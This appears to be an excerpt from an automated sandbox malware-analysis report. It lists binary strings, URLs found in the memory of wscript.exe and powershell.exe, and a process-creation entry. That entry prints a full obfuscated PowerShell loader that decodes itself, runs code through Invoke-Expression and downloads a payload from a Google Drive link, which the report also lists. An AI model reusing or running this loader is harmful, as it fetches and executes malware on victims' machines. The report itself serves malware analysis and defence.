Source: (empty)
Binary string: ion.pdbj source: powershell.exe, 00000002.00000002.2136067379.000002B82A53B000.00000004.00000020.00020000.00000000.sdmp
Source: (empty)
Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2178700348.000002B842AC9000.00000004.00000020.00020000.00000000.sdmp
Source: (empty)
Binary string: \??\C:\Users\user\AppData\Local\Microsoft\CLR_v4.0n.pdb source: powershell.exe, 00000002.00000002.2135929745.000002B82A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: (empty)
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp
Source: (empty)
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 00000002.00000002.2136067379.000002B82A54E000.00000004.00000020.00020000.00000000.sdmp
Source: (empty)
Binary string: CallSite.Target.pdbERSPROF] source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab= |
Source: wscript.exe, 00000000.00000003.2013570328.000001B413981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013924084.000001B4139A8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d6441c |
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe |
Source: wscript.exe, 00000000.00000003.2023391085.000001B4117C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2024986575.000001B411828000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021652412.000001B4117B5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ens |
Source: wscript.exe, 00000000.00000003.2013924084.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013570328.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d64 |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C43D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0P |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.comP |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82B932000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. 
UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,s |